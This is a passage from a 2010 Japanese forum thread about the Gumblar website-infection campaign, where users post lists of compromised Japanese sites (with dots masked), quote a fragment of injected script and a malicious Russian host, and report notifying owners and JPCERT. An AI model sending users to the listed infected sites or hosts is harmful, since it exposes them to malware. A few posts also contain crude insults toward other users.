10/05/13 14:41:11
>>719
日本語でおk

722:名無しさん@お腹いっぱい。
10/05/13 15:01:50
>>717
試しに踏んでみたけど何の反応もない。

723:名無しさん@お腹いっぱい
10/05/13 16:09:12
>717
spybot,ccc,>>713の方法で二回スキャンをかけました。
結果はゼロでウイルスは見つかりませんでしたが
念のためにリカバリしようと思います。

詳しい方が多いようなのでもう一つだけお願いします。
windows7を使っています。
outlookのメールをファイルに保存して、ファイルを外部CDへコピーし、
リカバリの後に戻そうと思っています。

その方法がOEと違っていて、参考になるサイトが見つかりません。
(Xp→7の方法や、OEのファイル保存方法がひっかかります)

windows liveで同期をとろうとしましたが、こちらも再インストールしても、うまくいきませんでした。

スレチなのでお叱り承知ですが、win7のメールの再生方法について、ご教授お願いいたします。
あと>>722さん踏ませてしまってごめんなさい。以後気をつけます。

724:名無しさん@お腹いっぱい。
10/05/13 16:14:20
ここはそういうスレちゃうねんで

725:名無しさん@お腹いっぱい。
10/05/13 16:16:12
URLリンク(support.microsoft.com)
URLリンク(www.microsoft.com)
URLリンク(www.atmarkit.co.jp)

726:名無しさん@お腹いっぱい。
10/05/13 16:16:25
>>723
> windows7を使っています。

なら感染してないよ、たぶん。

727:名無しさん@お腹いっぱい。
10/05/13 16:27:30
取扱注意

www●caaac●net
www●ykhsk●net
www●delldell●info
www●nkrc●co●jp
www●nihontouya●com

728:名無しさん@お腹いっぱい。
10/05/13 17:55:03
URLリンク(www.aguse.jp)
>バージョンアップ内容
> * (2010/05/13) 右クリックメニューからaguse / aguse Gatewayを利用するツールを公開しました。(Firefox3, IE8)

729:コテハン ◆8080adndqg
10/05/13 18:05:21
>>727
~\x2e\x70\x68\x70" 復活してたのねorz

【陥落サイトのURL悪用厳禁】
www●uranaiyakata●com/
lecoqsportif-jp●com/
www●tec●ne●jp/

ja-jp●facebook●com/ ←ぁ?

730:名無しさん@お腹いっぱい。
10/05/13 18:05:29
ru、cn、infoときて今度はどうなることやら
先進国はやられてほしくないものだが

731:名無しさん@お腹いっぱい。
10/05/13 18:52:37
だから、coTLDは関係無いっての

732:名無しさん@お腹いっぱい。
10/05/13 18:53:20
×coTLD

○ccTLD

733:名無しさん@お腹いっぱい。
10/05/13 18:53:43
このサイトチェッカー役にたたねー
URLリンク(www.honeywhales.com)

使い方の問題かもしれんが

734:名無しさん@お腹いっぱい。
10/05/13 20:11:28
関係ないが、ブラウザゲームサイトの中には、今でもshockwave player必須の所あるから、
心当たりがある奴はうpデートしといたほうがいい。
入れたの忘れてる可能性あるし、うpデートしにいけば、入ってるかどうかわかるし。

735:名無しさん@お腹いっぱい。
10/05/13 20:24:25
いちおうShockwavePlayerは自動更新機能あり(デフォで有効)。
ただ常駐しているわけではなくShockwave踏んだ時にチェックが走る模様。

736:名無しさん@お腹いっぱい。
10/05/13 20:26:02
>>726
感染したから改竄されたんじゃ。。。>>586,>>702,>>717,>>723

737:名無しさん@お腹いっぱい。
10/05/13 20:34:53
YouTubeやニコニコ動画に会員登録してるPCがGumblarに感染したら
勝手に作品とかアップロードされる?
あとOutlookやGMailに迷惑メールもいっぱい来るのだろうか

738:名無しさん@お腹いっぱい。
10/05/13 20:49:38
>>737
アップロードはない
そういうものじゃない
スパムメールについてはあるかもしれない

739:名無しさん@お腹いっぱい。
10/05/13 20:57:11
>>723
PC初心者さんはサイト運営とかやらんほうがいいよ
スレリンク(pcqa板:68番)

740:名無しさん@お腹いっぱい。
10/05/13 20:59:28
>>738
HP運営してないPCだとFTPじゃなくてサイトとかのID・PW抜かれるのかと思った

ISPからの個人あてメール(請求額等)は削除した方がいいな・・・

741:名無しさん@お腹いっぱい。
10/05/13 21:06:27
>>740
ネットワーク上の盗聴はしてるからそういうものは抜かれるよ
下の行についてはどういう意味でそれをするのかよくわからないけどお好みでどうぞ

742:名無しさん@お腹いっぱい。
10/05/14 07:02:29
亀かもしれんが
WordPressとかJoomlaとかそういうCMS使ってる?
それなら>>717は多分
URLリンク(blog.sucuri.net)
とか
URLリンク(www.wpsecuritylock.com)
そんな感じじゃないかな。
多分本人のPCに問題は無いと思う。多分だけど。

743:名無しさん@お腹いっぱい。
10/05/14 07:38:25
URLリンク(mobile-apoint.1047.jp)
このサイト、覗くとウイルスに感染するサイトですかね?
確認できる人おねがいします・・・
怖いのでURLの頭2つ消してます。
覗いてから、タスクマネージャが常に100%になって重すぎ状態に・・

744:名無しさん@お腹いっぱい。
10/05/14 07:44:16
URLリンク(www)●hsrc●co●kr

745:名無しさん@お腹いっぱい。
10/05/14 07:44:44
>>743
死ね

746:名無しさん@お腹いっぱい。
10/05/14 09:08:21
これだけ蔓延しているってことは逆に言えば
チェッカーサイトももっと改ざんを検出してくれるような有用なものが
もう2つか3つくらい出来てもいいのにと思う

そうすれば陥落サイトをここで警告できるのだが

747:名無しさん@お腹いっぱい。
10/05/14 09:34:11
ここは鑑定依頼スレではありません
あと専ブラによってはhttp://でもURLリンクします
危険URLは.を●にしましょう

総括:PC窓から投げ捨てて氏ね

748:名無しさん@お腹いっぱい。
10/05/14 11:23:16
どうしてそんなに千人とか万人の内のふたり三人に構うの?

749:名無しさん@お腹いっぱい。
10/05/14 11:26:02
下から三つなんて義務教育の内でも捨てられる階層だよね?
不思議で不思議でしょうがない

750:名無しさん@お腹いっぱい。
10/05/14 11:33:08
切り捨てようよ
本当につまらないんだよ

751:名無しさん@お腹いっぱい。
10/05/14 12:57:52
Windows Home Server その8
スレリンク(win板)

ここによればホームサーバのウィルス対策は個人の自由だそーな

752:名無しさん@お腹いっぱい。
10/05/14 13:31:53
>>746
そう思うなら作ればいいじゃない

753:名無しさん@お腹いっぱい。
10/05/14 13:32:28
>>742
だね・・・。
>>723は鵜呑みにしてリカバリしてしまったんだろうな(‐人‐)


754:名無しさん@お腹いっぱい。
10/05/14 13:48:42
CMS使えるレベルじゃないと思う

755:コテハン ◆8080adndqg
10/05/14 14:52:48
【陥落サイトのURL悪用厳禁】
www●netshikoku●com/n-sekisho/ ←絶賛放置中
※fuukei/niitaka/index.htmとか・・・

www●seibidou●jp/products/information_sign/index●html ←ここも絶賛放置中
途中で切れてるけど・・・いちおう

www●contiforce●com/
fourlcp●com/


756:名無しさん@お腹いっぱい。
10/05/14 17:22:47
たこ焼き注意
www●hipparidako●net

757:名無しさん@お腹いっぱい。
10/05/14 18:19:58
Internet Explorerが毎回「Active Xコントロールやプラグインなどの
ソフトウェアを実行できるようにしますか」と聞いてくるのですが
>>2に従い(1)~(4)の設定をしてからのように思うのです
ある画面では7回位連続して確認を取りにきます
これをしなくていいようにするにはどうすればいいのでしょうか
皆さん頻繁にOKのクリックをしておられるのですか?

758:名無しさん@お腹いっぱい。
10/05/14 18:41:55
URLリンク(www.google.co.jp)

759:名無しさん@お腹いっぱい。
10/05/14 18:47:43
>>756
二日前にメル凸した方が居る様で
対応済みとたこが言っていました

んだがしかし、rollover.js
URLリンク(www.virustotal.com)

URLリンク(www.aguse.jp)
[Gumblarの可能性あり]

760:名無しさん@お腹いっぱい。
10/05/14 19:34:04
>>759
Dr.WEBも赤く怒ってました

761:コテハン ◆8080adndqg
10/05/14 19:58:54
>>759
rollover●js
function M(){var・・・

passportblues●ru:8080


762:名無しさん@お腹いっぱい。
10/05/14 20:15:38
>>757
>>2は関係ありません

763:名無しさん@お腹いっぱい。
10/05/14 20:26:04
>>762
そうなんですか…
ありがとうございます

764:名無しさん@お腹いっぱい。
10/05/15 01:38:27
www●fukuyama-flowerlc●com
mysta-hair●com/premium/premium_list/

765:名無しさん@お腹いっぱい。
10/05/15 02:51:29
つうかIEなんぞ使うなといいたい。

766:名無しさん@お腹いっぱい。
10/05/15 03:33:31
なんでだ

767:名無しさん@お腹いっぱい。
10/05/15 06:09:42
めんどくさいから。


768:名無しさん@お腹いっぱい。
10/05/15 10:03:31
ケイダッシュがまたメンテ中。
またやられたのか。

しかも.htaccessのreplaceの設定が適当なのか、オードリーのページに直接行こうとするとアドレスがイミフなことに。
こんな素人以下のカスweb会社ってあるんだなぁ。

769:名無しさん@お腹いっぱい。
10/05/15 11:11:27
>>764
mysta-hair●com/premium/premium_list/も
会社概要にはホームページ作成とある件

770:名無しさん@お腹いっぱい。
10/05/15 12:19:04
avastってview-source:付けても反応するんだな。

771:名無しさん@お腹いっぱい。
10/05/15 14:07:11
www●jss-ltd●co●jp
www●netshikoku●com/n-sekisho/
www●brand89●com
www●ryu1●co●jp
www●tenkou1●net

772:名無しさん@お腹いっぱい。
10/05/15 18:04:00
逆に問いたい、なぜ感染していないの
スクショ系暴露ウイルスの怖さを認識したのが最近、Gumblarなんてその怖さを始めは理解できず、サイトもってないしあんま関係ないわ、こんな感じだった
やってたことと言えばOSのアプデとFirefox+NoscriptでJavaスクリプト切ってたくらい
が、サイトによっては結構ONにしてきたし
アドオンの方は更新頻度もテキトーだったし、AdobeリーダーなんてJavaスクリプトONで使いまくってたし、
今いろいろな設定して使ってることから考えると怖い、感染してないのが不思議だね
感染してないとは思うけどな

773:名無しさん@お腹いっぱい。
10/05/15 18:31:05
>感染してないのが不思議だね
>感染してないとは思うけどな

>_<

774:名無しさん@お腹いっぱい。
10/05/15 18:35:43
plus1●6●ql●bz
www●arktake●co●jp
www●g-himiko●co●jp

775:名無しさん@お腹いっぱい。
10/05/15 18:47:10
規制の巻き添えはもういやナリよ・・・
www●g-himiko●co●jp
www●arktake●co●jp
www●acl-music●jp

776:名無しさん@お腹いっぱい。
10/05/15 18:48:25
ぎゃーかぶったー

777:名無しさん@お腹いっぱい。
10/05/15 18:52:34
>>773
>< ぺけぽこ

778:名無しさん@お腹いっぱい。
10/05/15 18:56:32
かぶった腹いせDA!
i-walker●jp
anime●len2●net

779:名無しさん@お腹いっぱい。
10/05/15 19:45:08
>>773
majideそう思うわけ?
きちんと調べるわ

780:名無しさん@お腹いっぱい。
10/05/15 19:48:36
>>772
暴露ウィルスはおそらく作者日本人のいたずら

Gumblar含め世界的に流行ってるのは某C国のマフィアを始め、
クレジットカードや銀行口座の情報を盗む

ウィルス作者の作成の手腕も全然違うし
性質がそもそも違うので比較しても仕方が無い

781:名無しさん@お腹いっぱい。
10/05/15 19:49:47
途中で作ってて送信しちゃった

>Gumblar含め世界的に流行ってるのは某C国のマフィアを始め、
>クレジットカードや銀行口座の情報を盗む
>世界的な凶悪犯罪

782:名無しさん@お腹いっぱい。
10/05/15 20:26:28
つまり暗号されてない通信からいろいろ情報を抜かれるけどメールアカウントとか、
でもそれが目的じゃないから、口座やクレジット情報をPCで扱わない人は大丈夫って話?2次感染は防止しななきゃいかんけど
でももうそろそろウイルスの中身解析されたりで、転用がでてきたりするんだろうね

783:名無しさん@お腹いっぱい。
10/05/15 20:33:52
感染するのが怖い人はlyumo bookを使おう

784:名無しさん@お腹いっぱい。
10/05/15 20:38:55
結論


 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
                        |
       ____.____    | .__ 
     |        |        |   | |\_\
     |        | ∧_∧ |   | |  |.◎.|
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄

785:名無しさん@お腹いっぱい。
10/05/15 20:45:52
LiveCDで十分ですよ

786:名無しさん@お腹いっぱい。
10/05/15 20:54:42
ここは、これからもPCを使っていく人が、ウイルスの怖さを正しく認識し運用して行くスレ。
わかってない奴がいるのが訳わからん


787:名無しさん@お腹いっぱい。
10/05/15 22:08:05
>>782
メールアカウントはスパム送信に利用されます
ブログアカウントもコメントスパムに利用したり
それぞれ需要はあるのです

788:名無しさん@お腹いっぱい。
10/05/15 23:18:31
>>786
ここは、これからもWindowsを使っていく人が、ウイルスの怖さを正しく認識し運用して行くスレ。
わかってない奴がいるのが訳わからん

789:名無しさん@お腹いっぱい。
10/05/15 23:46:29
> www●acl-music●jp
これもガンブラーなの?

790:名無しさん@お腹いっぱい。
10/05/15 23:53:01
>>789
>>775

791:名無しさん@お腹いっぱい。
10/05/16 13:29:13
www●g-himiko●co●jp
www●arktake●co●jp
www●acl-music●jp

メル凸しときました
株式会社アークテイクはjpnic★alpha-web.jp宛なので不安が残る…

792:名無しさん@お腹いっぱい。
10/05/16 14:54:04
acl-musicは改ざんされすぎて元がなんだったのかよくわからないな
改ざん具合からしてだいぶ放置されてるようだから大元から止めないとダメだろう
JPCERT/CCにも送っておくわ

793:名無しさん@お腹いっぱい。
10/05/16 15:24:53
>>792
ありがと

794:名無しさん@お腹いっぱい。
10/05/16 17:03:07
www●yakitori●co●jp/kor/
www●njr●or●jp/m01/07/070405-2/ ←国土交通省関連の公益法人。
Topは改ざんされていないということは、修正漏れ?それにしても公表もしていないとは。。
www●spa-marufuku●com(FRAMEリンク先 park21●wakwak●com/~marufuku/ が感染)
www●3ku●jp
www●isshu●jp/001/470/ ←Topだけ直した?配下は改ざんされたまま
www●ryo-co●net
1excellent●com
楽天市場ショップの制作から運営代行まできめ細かくサポート ホームページ制作のエクセレント
って、またここが製作したページも感染しているのか。。
フォームからも送れないし。

795:名無しさん@お腹いっぱい。
10/05/16 20:01:13
祇園大蛇山は>>791の直後に発見、メル凸も済ませてあるけど、
公開連絡窓口のアドレスが死んでたのでカイクリエイツ宛て
メールフォームあるけどaguseGWなしで感染サイトに突撃する勇気は…

【悪用厳禁】
www●marbell●jp
www●any-news●biz :「自己防衛することも重要な世の中ですね」…重要だねorz

796:名無しさん@お腹いっぱい。
10/05/16 20:23:59
> www●marbell●jp
確認できないんだけど

797:名無しさん@お腹いっぱい。
10/05/16 20:27:52
>>796
gredで覗いてみて

798:名無しさん@お腹いっぱい。
10/05/16 22:06:28
www●acl-music●jp
改竄コードの見本市のようだw

799:コテハン ◆8080adndqg
10/05/17 10:40:29
【陥落サイトのURL悪用厳禁】
www●children-nepal●net/suryamukhi/handpuppets-j/woodenheadhandpuppets/home●htm
www●3ku●jp/grow_images/2005/june/index_2005june●html ←途中切れ
www●k3●dion●ne●jp/~sym1909 ←途中切れ
www●arktake●co●jp/
www●ryo-co●net/index●html
www●njr●or●jp/m01/07/070706/index●html ←←←
1excellent●com ←←←←ホームページ制作のエクセレント


800:名無しさん@お腹いっぱい。
10/05/17 11:41:02
URLリンク(blogs.yahoo.co.jp)
> 「wwwzuc32.exe」というキーワードでググってみたら、ここ最近
> (先週から?)の「Gumblar.8080」の改ざん攻撃を受けたページの閲覧で
> 発動・感染することになるファイル名のようですな。
へぇー。

801:名無しさん@お腹いっぱい。
10/05/17 13:00:34
>>799
> www●k3●dion●ne●jp/~sym1909
・hpbmapscript3.js
URLリンク(a001.aguse.jp)
メル凸しときました

【悪用厳禁】
www●kokushiad●jp :Gumblarが入学したようですorz
URLリンク(www.dan.co.uk)

802:名無しさん@お腹いっぱい。
10/05/17 13:17:16
ってあれ、国士舘のURLってwww●kokushikan●ac●jpだな
…じゃあここは何?

803:名無しさん@お腹いっぱい。
10/05/17 13:30:33
ぐぐったら入試課のものらしい
受験生向けっぽい

804:名無しさん@お腹いっぱい。
10/05/17 13:31:15
まちがえた
入学課だった

805:名無しさん@お腹いっぱい。
10/05/17 13:37:46
取扱注意
www●fuchucci●or●jp
府中商工会議所

806:名無しさん@お腹いっぱい。
10/05/17 14:07:16
>>803
ありがと、URL分けてるのね
そういうことならJPCERTにも報告しておきます

>>805
メールで凸っときました

807:名無しさん@お腹いっぱい。
10/05/17 17:20:27
本当、日本は餌食ですなぁ。
一般ユーザーは自動更新ガン無視、未だにIEは6。
web屋はアップデートすると業務に支障きたすとか言ってノーガード。

808:名無しさん@お腹いっぱい。
10/05/17 19:53:46
URLリンク(headlines.yahoo.co.jp)
>世界ブラウザ市場で、IE6は17.58%のシェアを持ち、2位に付けている

何も日本に限ったことではなさそうな…って2位かよ

809:名無しさん@お腹いっぱい。
10/05/17 20:28:21
IE7人気ないんだなあ…

810:名無しさん@お腹いっぱい。
10/05/17 20:47:45
IE7にしがみつく理由が何一つ無いからねぇ。
2000とかMeとか→IE6で終わり
XPとかVistaとか→IE8にできる

811:名無しさん@お腹いっぱい。
10/05/17 21:00:03
>>810
そうでもないぞ
低スペックPCではIE7の方が8より軽い


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch